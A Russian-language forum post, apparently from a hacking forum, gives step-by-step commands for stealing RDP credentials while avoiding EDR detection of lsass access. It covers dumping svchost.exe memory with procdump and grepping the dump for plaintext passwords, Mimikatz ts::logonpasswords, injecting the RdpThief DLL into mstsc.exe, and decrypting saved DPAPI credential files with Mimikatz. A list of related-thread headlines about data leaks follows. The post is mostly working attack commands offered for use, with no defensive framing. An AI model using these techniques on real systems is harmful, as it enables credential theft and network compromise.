Статья Извлечение учетных данных RDP: методы обхода EDR для Red Team

devqp

Специалист
Протокол удаленного рабочего стола (RDP) часто используется без должной защиты, что позволяет Red Team извлекать учетные данные для горизонтального перемещения или компрометации домена. Альтернативные методы сбора данных без обращения к lsass (мониторинг EDR) включают эксплуатацию процессов svchost.exe и mstsc.exe.

1. Извлечение из svchost.exe:
При RDP-аутентификации учетные данные хранятся в памяти svchost в открытом виде. Для идентификации нужного процесса:
Код:
sc queryex termservice
tasklist /M:rdpcorets.dll
netstat -nob | Select-String TermService -Context 1
Пароль отображается в строках памяти. Дамп процесса:
Код:
procdump64.exe -ma [PID] -accepteula C:\target_dir
Автономный анализ:
Код:
strings -el svchost* | grep [Password] -C3
Mimikatz альтернатива:
Код:
privilege::debug
ts::logonpasswords

2. Перехват через mstsc.exe:
Инструмент RdpThief внедряет DLL для перехвата API-функций:
Код:
SimpleInjector.exe mstsc.exe RdpThief.dll
Учетные данные записываются в C:\temp\creds.txt. Улучшенная версия SharpRDPThief (C#) использует IPC-сервер для постоянного мониторинга.

3. Расшифровка сохраненных RDP-файлов:
Учетные данные хранятся в:
Код:
C:\Users\[user]\AppData\Local\Microsoft\Credentials\[file_id]
Дешифровка Mimikatz:
Код:
dpapi::cred /in:[file_path]
sekurlsa::dpapi
dpapi::cred /in:[file_path] /masterkey:[key]
Просмотр связанного сервера:
Код:
vault::list

Все методы демонстрируют уязвимости в управлении RDP-сессиями и позволяют обходить стандартные механизмы защиты.
 
Похожие темы
K Извлечение всех паролей (веб-браузеры, почтовые программы и пр.) в Windows и Linux Уязвимости и взлом 3
Admin UFOLABSNEWS Полиция ликвидировала сеть распространения вредоносных программ Amadey и StealC, восстановив 27 млн украденных учетных данных. Новости в сети 0
Admin Интересно Вредоносное ПО для кражи учетных данных обнаружено в популярном инструменте Codex. Новости в сети 0
Admin Интересно Новый бэкдор PamDOORa использует модули PAM для кражи SSH-учетных данных. Новости в сети 0
Admin Интересно Хакеры используют уязвимость CVE-2025-55182 для взлома 766 хостов Next.js и кражи учетных данных. Новости в сети 0
Admin Интересно Хакеры используют уведомления LinkedIn для кражи учетных данных. Новости в сети 0
Admin Интересно TeamPCP взламывает GitHub Actions Checkmarx с использованием украденных учетных данных CI. Новости в сети 0
Admin Интересно Storm-2561 распространяет троянские VPN-клиенты через SEO-отравление для кражи учетных данных. Новости в сети 0
Admin Интересно Злоумышленники используют уязвимости FortiGate для проникновения в сети и кражи учетных данных. Новости в сети 0
A БД содержащая 1,4 млрд учетных данных Полезные статьи 14
Admin UFOLABSNEWS Количество утечек данных в России сократилось почти вдвое. Новости в сети 0
Admin UFOLABSNEWS Исследование выявило утечки данных и отслеживание в популярных бесплатных VPN для Android. Новости в сети 0
Admin UFOLABSNEWS Крупные IT-компании столкнулись с дефицитом трансформаторов для центров обработки данных. Новости в сети 0
Admin UFOLABSNEWS Новая группа Helix использует фишинг для кражи данных из SharePoint. Новости в сети 0
Admin UFOLABSNEWS Университет Mount Royal подтвердил утечку данных после кибератаки. Новости в сети 0
Admin UFOLABSNEWS 35 ГБ конфиденциальных данных Accenture появились на хакерском форуме. Новости в сети 0
Admin UFOLABSNEWS Японский телеком-гигант KDDI сообщил об утечке данных 12 миллионов пользователей. Новости в сети 0
Admin UFOLABSNEWS Фишинговая кампания имитирует собеседования от известных брендов для кражи данных Google. Новости в сети 0
Admin UFOLABSNEWS Исследователи разработали метод TrojPix для утечки данных с изолированных систем через видеокабель. Новости в сети 0
Admin UFOLABSNEWS 19-летнего хакера экстрадировали в США за кражу данных ювелирного бренда. Новости в сети 0
Admin UFOLABSNEWS Компания Medtronic уведомляет клиентов о утечке данных из-за атаки ShinyHunters. Новости в сети 0
Admin UFOLABSNEWS Новая атака BioShocking обманывает ИИ-браузеры для кражи данных. Новости в сети 0
Admin UFOLABSNEWS Хакеры используют поддельные рабочие пространства ChatGPT для кражи корпоративных данных. Новости в сети 0
Admin UFOLABSNEWS Бывший советник по нацбезопасности США признал вину в утечке секретных данных. Новости в сети 0
Admin UFOLABSNEWS Украинские спецслужбы раскрыли кампанию российских хакеров по краже данных через фейковые SMS. Новости в сети 0
Admin UFOLABSNEWS Бельгийская разведка год не замечала утечку данных с рабочих устройств. Новости в сети 0
Admin UFOLABSNEWS Забытый доступ из 2022 года привёл к утечке данных LastPass и других компаний. Новости в сети 0
Admin UFOLABSNEWS Утечка данных в Техасе затронула более 3 миллионов человек. Новости в сети 0
Admin UFOLABSNEWS Утечка данных раскрыла систему скрытых оценок участников закрытого клуба Питера Тиля. Новости в сети 0
Admin UFOLABSNEWS Глава британского регулятора данных ушёл в отставку из-за неподобающего поведения. Новости в сети 0
Admin UFOLABSNEWS Дешёвые ТВ-приставки могут использоваться для обхода блокировок и сбора данных. Новости в сети 0
Admin Интересно Salesforce отключила интеграцию с приложением Klue из-за утечки данных клиентов. Новости в сети 0
Admin Интересно Британский регулятор начал расследование сбора персональных данных умными телевизорами. Новости в сети 0
Admin Интересно SQL Server 2025: новые функции ИИ стали инструментом для кражи данных. Новости в сети 0
Admin Интересно Хакеры заявили о масштабной утечке данных Совета Европы. Новости в сети 0
Admin Интересно Более 73 тысяч аккаунтов пострадали от утечки данных на платформе Tchap. Новости в сети 0
Admin Интересно Утечка данных Dynatrace через токен доступа в GitHub. Новости в сети 0
Admin Интересно Google собирает новую базу данных для развития искусственного интеллекта. Новости в сети 0
Admin Интересно Хакерская группа ShinyHunters заявила о взломе данных Ralph Lauren. Новости в сети 0
Admin Интересно Евросоюз упрощает процесс уведомления о утечках данных. Новости в сети 0
Admin Интересно Уязвимость в WinRAR используется российскими группами для кражи данных в Украине. Новости в сети 0
Admin Интересно GrapheneOS считает подозрительными заявления Yoti о передаче данных пользователей властям. Новости в сети 0
Admin Интересно Группировка UNC3753 использует телефонные звонки и личные визиты для кражи данных в США. Новости в сети 0
Admin Интересно Мессенджеры собирают больше данных, чем нужно для переписки. Новости в сети 0
Admin Интересно Утечка данных Grindr ставит под угрозу пароли и местоположения пользователей. Новости в сети 0
Admin Интересно Хакеры вынесли из IKEA 180 ГБ конфиденциальных данных. Новости в сети 0
Admin Интересно Голландская группа защиты прав подала жалобу на сбор и продажу интимных данных приложением Flo. Новости в сети 0
Admin Интересно Злоумышленники используют уязвимость FortiClient EMS для кражи данных. Новости в сети 0
Admin Интересно Исследователи сомневаются в реальности утечки данных IBM. Новости в сети 0
Admin Интересно Иранские хакеры автоматизировали уничтожение данных GPS-сервиса США. Новости в сети 0

Название темы